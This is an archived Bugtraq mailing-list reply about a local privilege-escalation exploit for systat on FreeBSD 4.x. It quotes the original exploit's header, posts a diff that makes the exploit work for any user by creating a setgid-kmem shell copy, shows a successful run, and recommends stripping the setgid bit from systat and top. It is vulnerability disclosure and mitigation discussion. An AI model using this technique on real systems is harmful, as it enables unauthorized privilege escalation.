Bugtraq mailing list archives
Re: FreeBSD 4.x systat exploit
From: Steve Reid <sreid () SEA-TO-SKY NET>
Date: Tue, 10 Oct 2000 18:28:44 -0700
On Tue, Oct 10, 2000 at 02:52:17PM +0200, Przemyslaw Frasunek wrote:
#!/bin/csh # (c) 2000 Przemys?aw Frasunek <venglin () freebsd lublin pl> # # FreeBSD 4.x systat gid=kmem exploit # Idea by: Jouko Pynnönen <jouko () SOLUTIONS FI> # # Dedicated to ksm.
[etc] It doesn't work as posted. But that doesn't mean systat is safe, it just means you aren't "venglin": --- exploit.csh.orig Tue Oct 10 17:42:49 2000 +++ exploit.csh Tue Oct 10 17:46:53 2000 @@ -11,7 +11,7 @@ #!/bin/csh cp /bin/csh /tmp -/usr/sbin/chown venglin.kmem /tmp/csh +chgrp kmem /tmp/csh chmod 2755 /tmp/csh __EOF__ And now it works: steve@grok:/home/steve% ./exploit.csh -rwxr-sr-x 1 steve kmem 622908 Oct 10 18:15 /tmp/csh steve@grok:/home/steve% uname -srm FreeBSD 4.1-RELEASE i386 BTW, /usr/bin/top is also linked to ncurses. I don't know if it's vunlerable or not (the exploit does nothing to top in my limited testing) but it might be prudent to remove the setgid bit from it too. chmod a-s /usr/bin/systat /usr/bin/top
Current thread:
- FreeBSD 4.x systat exploit Przemyslaw Frasunek (Oct 10)
- Re: FreeBSD 4.x systat exploit Steve Reid (Oct 10)